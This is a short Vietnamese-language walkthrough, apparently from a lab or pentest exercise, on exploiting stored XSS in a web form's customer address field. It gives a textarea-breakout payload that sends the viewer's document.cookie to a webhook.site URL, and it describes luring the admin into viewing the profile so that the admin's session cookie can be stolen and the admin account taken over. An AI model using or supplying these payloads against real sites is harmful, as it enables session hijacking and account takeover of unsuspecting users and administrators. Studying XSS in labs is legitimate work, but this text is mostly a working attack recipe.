<script>alert('XSS')</script>
thấy nó vẫn không thực thi, hãy vào f12 để check 


    <div class="form-group">
        <label>Customer Address:</label>
        <textarea name="c_address" class="form-control" required><script>alert('Stored XSS')</script></textarea>
    </div>

bị biến thành file textarea , by pass payload mới: 


<textarea><script>alert('XSS')</script></textarea>

bật webhooksite , lấy url sau đó sử dụng payld này: 

</textarea><script>new Image().src="https://webhook.site/3dfac2da-0be8-4540-b8b5-ca0c10a374b9?cookie="+document.cookie;</script><textarea>
 

Chiêu này có thể đánh lừa được thằng admin , dụ nó vào xem thông tin của mình , kể từ đó mình có thể steal đc cookie và đăng nhập với account admin 


- Ở chức năng My Friends của account, search tên user đã tiêm payload , rồi vào webhook site đã thấy get được cookie của họ hay chưa 